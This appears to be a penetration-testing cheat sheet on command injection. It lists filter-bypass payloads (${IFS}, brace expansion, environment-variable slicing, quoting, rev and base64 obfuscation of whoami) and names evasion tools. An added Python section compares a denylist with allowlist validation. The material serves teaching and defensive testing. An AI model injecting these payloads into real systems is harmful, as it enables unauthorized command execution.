
Command Injection

Bypassing Space Filters

Using Tabs (%09)

127.0.0.1%0a%09

Using $IFS

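The default value of the Linux shell variable $IFS (Internal Field Separator) includes a space and a tab, so ${IFS} can stand in for a space where a literal space is filtered.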

127.0.0.1%0a${IFS}

Using Brace Expansion

127.0.0.1%0a{ls,-la}

Bypassing Other Blacklisted Characters

Linux

Character    Bypass
/            ${PATH:0:1}
;            ${LS_COLORS:10:1}

Windows

CMD

C:\htb> echo %HOMEPATH:~6,-11%

\

PowerShell

PS C:\htb> $env:HOMEPATH[0]

\


PS C:\htb> $env:PROGRAMFILES[10]
PS C:\htb>

Character Shifting

$ echo $(tr '!-}' '"-~'<<<[)
\

Bypassing Blacklisted Commands

w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<d2hvYW1pCg==)  # using <<< to avoid using a pipe |
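
Every string above targets a filter that enumerates bad characters or command names. As an added example (not part of the original page), the Python code below runs strings copied from this page through a constructed denylist and through strict allowlist parsing of the expected IP address; the denylist contents and all function names are assumptions made for illustration.

```python
import ipaddress
from urllib.parse import unquote

# Constructed denylist: the kind of filter the strings on this page are written against.
BLOCKED_CHARS = set(" ;/|&")
BLOCKED_WORDS = ("whoami",)

# Strings copied verbatim from this page (URL-encoded where the page shows them encoded).
PAGE_SAMPLES = [
    "127.0.0.1%0a%09",
    "127.0.0.1%0a${IFS}",
    "127.0.0.1%0a{ls,-la}",
    "${PATH:0:1}",
    "${LS_COLORS:10:1}",
    "w'h'o'am'i",
    "who$@ami",
    "$(rev<<<'imaohw')",
]

def denylist_accepts(raw: str) -> bool:
    """Naive filter: accept unless a blocked character or command name appears."""
    value = unquote(raw)  # the web framework decodes %0a / %09 before the filter runs
    if BLOCKED_CHARS & set(value):
        return False
    return not any(word in value.lower() for word in BLOCKED_WORDS)

def allowlist_accepts(raw: str) -> bool:
    """Strict check: the whole value must parse as one IP address, nothing else."""
    try:
        ipaddress.ip_address(unquote(raw))
        return True
    except ValueError:
        return False

def build_ping_argv(raw: str) -> list[str]:
    """Return an argv list for subprocess.run(argv), no shell; ValueError if invalid."""
    addr = ipaddress.ip_address(unquote(raw))
    return ["ping", "-c", "1", str(addr)]

def compare() -> list[tuple[str, bool, bool]]:
    """For each page sample: (sample, denylist verdict, allowlist verdict)."""
    return [(s, denylist_accepts(s), allowlist_accepts(s)) for s in PAGE_SAMPLES]

if __name__ == "__main__":
    for sample, deny_ok, allow_ok in compare():
        print(f"{sample!r:26} denylist={'pass' if deny_ok else 'block'} "
              f"allowlist={'pass' if allow_ok else 'block'}")
```

The denylist passes every sample while the allowlist rejects all of them, and the validated address reaches the program as a single argv element, so no shell ever interprets it.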

Evasion Tools

Linux

Bashfuscator

Windows

DOSfuscation